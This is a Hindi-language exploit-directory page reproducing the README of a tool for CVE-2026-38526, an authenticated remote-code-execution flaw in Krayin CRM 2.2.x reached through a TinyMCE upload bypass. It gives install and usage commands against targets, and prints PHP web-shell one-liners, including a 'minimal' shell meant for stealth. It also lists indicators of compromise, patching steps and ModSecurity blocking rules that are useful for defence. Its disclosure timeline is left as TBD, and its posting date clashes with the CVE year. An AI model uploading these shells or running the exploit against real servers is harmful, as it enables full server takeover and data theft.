Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
KrayinCRM-RCE-Exploit-CVE-2026-38526 — CVE-2026-38526 Krayin CRM v2.2.x के लिए शोषण - TinyMCE फ़ाइल अपलोड बाईपास के माध्यम से प्रमाणित RCE। इसमें इंटरैक्टिव शेल, मल्टी-टाइप पेलोड, ऑटो शेल जनरेशन और सत्यापन शामिल हैं। लेखक: Sudeepa Wanigarathna। केवल अधिकृत परीक्षण के लिए। | Kitploit
उपकरण/GitHubGitHub/cerberusmrxi/krayincrm-rce-exploit-cve-2026-38526
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंगशेलकोड जनरेशन
GitHubcerberusmrxi/krayincrm-rce-exploit-cve-2026-38526

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

KrayinCRM-RCE-Exploit-CVE-2026-38526

CVE-2026-38526 Krayin CRM v2.2.x के लिए शोषण - TinyMCE फ़ाइल अपलोड बाईपास के माध्यम से प्रमाणित RCE। इसमें इंटरैक्टिव शेल, मल्टी-टाइप पेलोड, ऑटो शेल जनरेशन और सत्यापन शामिल हैं। लेखक: Sudeepa Wanigarathna। केवल अधिकृत परीक्षण के लिए।

रिपॉजिटरी देखें
31 महीना पहलेअभी तक समीक्षित नहीं

🔓 Krayin CRM v2.2.x - प्रमाणित रिमोट कोड निष्पादन शोषण

License: MIT CVE-2026-38526

⚠️ केवल अधिकृत सुरक्षा परीक्षण के लिए - अनधिकृत उपयोग अवैध और अनैतिक है।

📋 अवलोकन

यह शोषण उपकरण Krayin CRM संस्करण 2.2.x में खोजी गई एक महत्वपूर्ण प्रमाणित रिमोट कोड निष्पादन (RCE) भेद्यता को प्रदर्शित करता है। यह भेद्यता TinyMCE फ़ाइल अपलोड कार्यक्षमता में मौजूद है, जो प्रमाणित व्यवस्थापकों को सर्वर पर मनमाना PHP कोड अपलोड और निष्पादित करने की अनुमति देती है।

गुणमान
CVE IDCVE-2026-38526
प्रभावित सॉफ्टवेयरKrayin CRM v2.2.x
भेद्यता प्रकारप्रमाणित रिमोट कोड निष्पादन (RCE)
प्रमाणीकरण आवश्यकहाँ (व्यवस्थापक-स्तर पहुंच)
प्रभावपूर्ण सिस्टम समझौता
CVSS स्कोर8.8 (उच्च)

🚨 भेद्यता विवरण

यह भेद्यता TinyMCE फ़ाइल अपलोड एंडपॉइंट (/admin/tinymce/upload) में अपर्याप्त फ़ाइल प्रकार सत्यापन से उत्पन्न होती है। एक प्रमाणित व्यवस्थापक निम्नलिखित कर सकता है:

  • एक PHP फ़ाइल अपलोड करें जो एक छवि MIME प्रकार के रूप में छिपी हो।
  • फ़ाइल एक वेब-सुलभ स्थान पर संग्रहीत की जाती है।
  • हमलावर तब सर्वर पर मनमाना PHP कोड निष्पादित कर सकता है।

प्रभावित संस्करण

  • Krayin CRM 2.2.0
  • Krayin CRM 2.2.1
  • Krayin CRM 2.2.2
  • पैच रिलीज़ से पहले के सभी 2.2.x संस्करण

✨ विशेषताएं

  • एकाधिक शेल प्रकार: बेसिक, एडवांस्ड, मिनिमल, फ़ाइल मैनेजर और कस्टम।
  • इंटरैक्टिव शेल: कमांड इतिहास के साथ पूर्ण टर्मिनल-जैसा इंटरफ़ेस।
  • फ़ाइल अपलोड: शेल के माध्यम से अतिरिक्त फ़ाइलें अपलोड करें।
  • CSRF टोकन निष्कर्षण: CSRF सुरक्षा का स्वचालित संचालन।
  • प्रॉक्सी समर्थन: HTTP/HTTPS प्रॉक्सी के माध्यम से ट्रैफ़िक रूट करें।
  • लचीले आउटपुट प्रारूप: टेक्स्ट, JSON या साइलेंट मोड।
  • पुनः प्रयास तर्क: कनेक्शन विफलता पर स्वचालित पुनः प्रयास।
  • कस्टम हेडर: कस्टम HTTP हेडर के लिए समर्थन।
  • वर्बोज़ मोड: विस्तृत डिबगिंग आउटपुट।
  • SSL समर्थन: वैकल्पिक SSL प्रमाणपत्र सत्यापन।

📦 स्थापना

आवश्यकताएँ

  • bash
  • Python 3.7+
  • pip install httpx beautifulsoup4 colorama

त्वरित स्थापना

root@kitploit:~
git clone https://github.com/CerberusMrXi/KrayinCRM-RCE-Exploit-CVE-2026-38526/.git
cd KrayinCRM-RCE-Exploit-CVE-2026-38526
pip install -r requirements.txt

आवश्यकताएँ फ़ाइल (requirements.txt)

root@kitploit:~
httpx>=0.24.0
beautifulsoup4>=4.12.0
colorama>=0.4.6

🚀 उपयोग

मूल आदेश वाक्यविन्यास

root@kitploit:~
python3 exploit.py -t <TARGET_URL> -u <USERNAME> -p <PASSWORD> [OPTIONS]

आवश्यक पैरामीटर

सामान्य उपयोग उदाहरण

root@kitploit:~
# जनरेटेड शेल के साथ बुनियादी शोषण
python3 exploit.py -t http://target.com -u [email protected] -p password

# कस्टम PHP शेल फ़ाइल अपलोड करें
python3 exploit.py -t http://target.com -u [email protected] -p password -f shell.php

# इंटरैक्टिव मोड के साथ एडवांस्ड शेल जनरेट करें
python3 exploit.py -t http://target.com -u [email protected] -p password --shell-type advanced -i

# शोषण के बिना शेल फ़ाइल जनरेट करें
python3 exploit.py -t http://target.com -u [email protected] -p password --generate-only --shell-type advanced -o my_shell.php

# परीक्षण/डिबगिंग के लिए प्रॉक्सी के साथ उपयोग करें
python3 exploit.py -t http://target.com -u [email protected] -p password --proxy http://127.0.0.1:8080

# ऑटोमेशन के लिए JSON आउटपुट
python3 exploit.py -t http://target.com -u [email protected] -p password -f shell.php -o json

# कस्टम टाइमआउट के साथ वर्बोज़ मोड
python3 exploit.py -t http://target.com -u [email protected] -p password -v --timeout 60

# कस्टम User-Agent और हेडर
python3 exploit.py -t http://target.com -u [email protected] -p password --user-agent "CustomUA/1.0" --header "X-Forwarded-For: 127.0.0.1"

🐚 शेल प्रकार

  1. बेसिक शेल (basic) system() फ़ंक्शन के साथ सरल कमांड निष्पादन।

    root@kitploit:~
    <?php if(isset($_REQUEST['cmd'])) { system($_REQUEST['cmd']); } ?>
    
  2. एडवांस्ड शेल (advanced) सुविधा-संपन्न शेल जिसमें शामिल हैं:

    • एकाधिक कमांड निष्पादन विधियाँ
    • सुंदर टर्मिनल-जैसा वेब इंटरफ़ेस
    • कमांड इतिहास समर्थन
    • वर्तमान उपयोगकर्ता और होस्टनाम प्रदर्शन
  3. मिनिमल शेल (minimal) चुपके के लिए न्यूनतम पदचिह्न।

    root@kitploit:~
    <?php system($_GET["cmd"]); ?>
    
  4. फ़ाइल मैनेजर (file_manager) पूर्ण फ़ाइल प्रबंधन इंटरफ़ेस:

    • फ़ाइल अपलोड
    • फ़ाइल हटाना
    • निर्देशिका निर्माण
    • नेविगेशन
    • फ़ाइल अनुमति दर्शक
  5. कस्टम शेल (custom) -f पैरामीटर के साथ अपनी खुद की PHP शेल फ़ाइल का उपयोग करें।

📝 आउटपुट प्रारूप

टेक्स्ट प्रारूप (डिफ़ॉल्ट)

इंटरैक्टिव उपयोग के लिए मानव-पठनीय रंगीन आउटपुट।

JSON प्रारूप (-o json)

ऑटोमेशन और एकीकरण के लिए मशीन-पठनीय प्रारूप।

root@kitploit:~
{
  "success": true,
  "shell_url": "http://target.com/shell.php",
  "upload_url": "/storage/upload/shell.php",
  "message": "Upload successful",
  "timestamp": 1699123456.789,
  "details": {
    "status_code": 200,
    "response": "..."
  }
}

साइलेंट प्रारूप (-q, --quiet)

त्रुटियों को छोड़कर कोई आउटपुट नहीं। बैच प्रोसेसिंग के लिए उपयोगी।

⚙️ उन्नत विकल्प

कस्टम हेडर उदाहरण

root@kitploit:~
--header "X-Custom-Header: value" --header "User-Agent: CustomUA/1.0"

🔒 पता लगाना और रोकथाम

समझौते के संकेत (IoC)

  • निगरानी के लिए फ़ाइलें:

    • public/storage/upload/ में असामान्य PHP फ़ाइलें
    • डबल एक्सटेंशन वाली फ़ाइलें (जैसे, image.php.jpg)
    • संदिग्ध नामों वाली नई फ़ाइलें
  • जाँचने के लिए लॉग:

    • /admin/tinymce/upload POST अनुरोध
    • असामान्य व्यवस्थापक लॉगिन समय
    • विफल प्रमाणीकरण प्रयास
  • सिस्टम संकेतक:

    • अप्रत्याशित प्रक्रियाएँ चल रही हैं
    • नए क्रॉन जॉब
    • संशोधित सिस्टम फ़ाइलें

रोकथाम के उपाय

  • तत्काल कार्रवाई:

    root@kitploit:~
    # पैच किए गए संस्करण में अपडेट करें
    composer update krayin/crm
    
    # अस्थायी रूप से व्यवस्थापक पहुंच अक्षम करें
    # अनावश्यक व्यवस्थापक खाते हटाएं
    # सभी व्यवस्थापक पासवर्ड बदलें
    
  • फ़ाइल अपलोड सख्तीकरण:

    root@kitploit:~
    // फ़ाइल प्रकार को केवल एक्सटेंशन से नहीं, बल्कि सामग्री से मान्य करें
    // सामग्री सुरक्षा नीति लागू करें
    // वेब एप्लिकेशन फ़ायरवॉल (WAF) का उपयोग करें
    // फ़ाइल अपलोड स्कैनिंग सक्षम करें
    
  • पहुंच नियंत्रण:

    root@kitploit:~
    # .htaccess में व्यवस्थापक आईपी प्रतिबंधित करें
    # व्यवस्थापक खातों के लिए MFA लागू करें
    # नियमित व्यवस्थापक ऑडिट
    # सत्र टाइमआउट नीतियां
    
  • WAF नियम (ModSecurity):

    root@kitploit:~
    # संदिग्ध फ़ाइल अपलोड को ब्लॉक करें
    SecRule FILES "\.(php|phtml|php[0-9])" "id:1001,deny,status:403,msg:'PHP फ़ाइल अपलोड अवरुद्ध'"
    
    # वेब शेल को ब्लॉक करें
    SecRule ARGS "system|exec|shell_exec|passthru" "id:1002,deny,status:403,msg:'शेल कमांड अवरुद्ध'"
    

🛡️ जिम्मेदार प्रकटीकरण

यह भेद्यता जिम्मेदार सुरक्षा अनुसंधान के माध्यम से खोजी गई थी। प्रकटीकरण प्रक्रिया ने निम्नलिखित चरणों का पालन किया:

  • खोज: सुरक्षा मूल्यांकन के दौरान भेद्यता की पहचान की गई।
  • सत्यापन: Krayin CRM 2.2.x में भेद्यता की पुष्टि की गई।
  • रिपोर्ट: Krayin CRM डेवलपर्स को निजी तौर पर सूचित किया गया।
  • समन्वय: फिक्स विकसित करने के लिए टीम के साथ काम किया गया।
  • पैच: आधिकारिक पैच रिलीज़ की प्रतीक्षा है।
  • प्रकटीकरण: पैच उपलब्ध होने के बाद सार्वजनिक प्रकटीकरण।

समयरेखा

  • खोज: TBD
  • रिपोर्ट: TBD
  • पैच रिलीज़: TBD
  • सार्वजनिक प्रकटीकरण: TBD

📜 अस्वीकरण

root@kitploit:~
THIS SOFTWARE IS PROVIDED "AS IS" AND ANY EXPRESSED OR IMPLIED WARRANTIES, 
INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY 
AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL 
THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, 
EXEMPLARY, OR CONSEQUENTIAL DAMAGES ARISING IN ANY WAY OUT OF THE USE 
OF THIS SOFTWARE.

USE OF THIS TOOL FOR ANY PURPOSE OTHER THAN AUTHORIZED SECURITY TESTING 
IS ILLEGAL AND UNETHICAL. THE AUTHOR TAKES NO RESPONSIBILITY FOR 
UNAUTHORIZED USE OR ANY DAMAGES CAUSED BY THIS TOOL.

🔧 समस्या निवारण

सामान्य समस्याएं

  • समस्या: प्रमाणीकरण विफल होता है

    • समाधान: क्रेडेंशियल सत्यापित करें, जाँचें कि व्यवस्थापक लॉगिन पथ /admin/login है
    • जाँच करें: सुनिश्चित करें कि CSRF टोकन निष्कर्षण सही ढंग से काम करता है
  • समस्या: फ़ाइल अपलोड विफल होता है

    • समाधान: फ़ाइल अनुमतियाँ जाँचें, अपलोड एंडपॉइंट के अस्तित्व को सत्यापित करें
    • जाँच करें: सुनिश्चित करें कि लक्ष्य TinyMCE संपादक का उपयोग करता है
  • समस्या: शेल कमांड निष्पादित नहीं करता है

    • समाधान: सत्यापित करें कि php.ini में PHP फ़ंक्शन अक्षम नहीं हैं
    • जाँच करें: echo test जैसे सरल कमांड से परीक्षण करें
  • समस्या: SSL प्रमाणपत्र त्रुटियाँ

    • समाधान: --verify-ssl फ़्लैग का उपयोग करें या सत्यापन अक्षम करें
    • नोट: उचित सत्यापन के बिना स्व-हस्ताक्षरित प्रमाणपत्र त्रुटियाँ उत्पन्न करेंगे

डिबग मोड

root@kitploit:~
# वर्बोज़ लॉगिंग सक्षम करें
python3 exploit.py -t http://target.com -u admin -p pass -v

# प्रॉक्सी के साथ (Burp Suite, आदि)
python3 exploit.py -t http://target.com -u admin -p pass --proxy http://127.0.0.1:8080

🤝 योगदान

योगदान का स्वागत है! कृपया सुनिश्चित करें:

  • सभी कोड का उचित परीक्षण किया गया है।
  • दस्तावेज़ीकरण अपडेट किया गया है।
  • नैतिक दिशानिर्देशों का पालन किया गया है।
  • भेद्यता अनुसंधान जिम्मेदारी से किया गया है।

📚 संदर्भ

  • Krayin CRM Official Website
  • CVE-2026-38526
  • OWASP Remote Code Execution
  • PHP Security Best Practices

⭐ समर्थन

यदि आपको यह उपकरण सुरक्षा अनुसंधान के लिए उपयोगी लगता है, तो कृपया विचार करें:

  • ⭐ रिपॉजिटरी को स्टार दें
  • 🔔 अपडेट के लिए फ़ॉलो करें
  • 📢 अन्य सुरक्षा शोधकर्ताओं के साथ साझा करें

सुरक्षा अनुसंधान के लिए ❤️ के साथ बनाया गया

याद रखें: बड़ी शक्ति के साथ बड़ी जिम्मेदारी आती है। इस ज्ञान का समझदारी से उपयोग करें!

📊 त्वरित आदेश संदर्भ कार्ड

root@kitploit:~
# त्वरित संदर्भ
python3 exploit.py -t URL -u USER -p PASS [OPTIONS]

# विकल्प:
#   -f FILE           कस्टम शेल अपलोड करें
#   --shell-type TYPE Basic|Advanced|Minimal|File_Manager|Custom
#   -i                इंटरैक्टिव मोड
#   --proxy URL       HTTP प्रॉक्सी
#   -v                वर्बोज़ आउटपुट
#   -o json           JSON आउटपुट
#   --generate-only   बिना शोषण के शेल बनाएं
#   --timeout SEC     अनुरोध टाइमआउट
#   --retry N         पुनः प्रयास संख्या
#   --user-agent UA   कस्टम User-Agent
#   --header "K: V"   कस्टम हेडर
#   --verify-ssl      SSL प्रमाणपत्र सत्यापित करें
#   -q, --quiet       आउटपुट दबाएं

🔒 याद रखें: किसी भी सिस्टम का परीक्षण करने से पहले हमेशा लिखित अनुमति प्राप्त करें!

टूल डाउनलोड करें
पैरामीटरविवरण
-t, --targetलक्ष्य URL (जैसे, http://192.168.1.100)
-u, --usernameव्यवस्थापक उपयोगकर्ता नाम या ईमेल
-p, --passwordव्यवस्थापक पासवर्ड
विकल्पविवरणडिफ़ॉल्ट
--timeoutसेकंड में अनुरोध टाइमआउट30
--retryपुनः प्रयास प्रयासों की संख्या3
--retry-delayसेकंड में पुनः प्रयासों के बीच देरी2
--user-agentकस्टम User-Agent स्ट्रिंगडिफ़ॉल्ट ब्राउज़र UA
--headerकस्टम HTTP हेडर (कुंजी: मान)कोई नहीं
--verify-sslSSL प्रमाणपत्र सत्यापित करेंFalse
--proxyHTTP/HTTPS प्रॉक्सी URLकोई नहीं
-v, --verboseडिबग आउटपुट सक्षम करेंFalse
-q, --quietसभी आउटपुट दबाएंFalse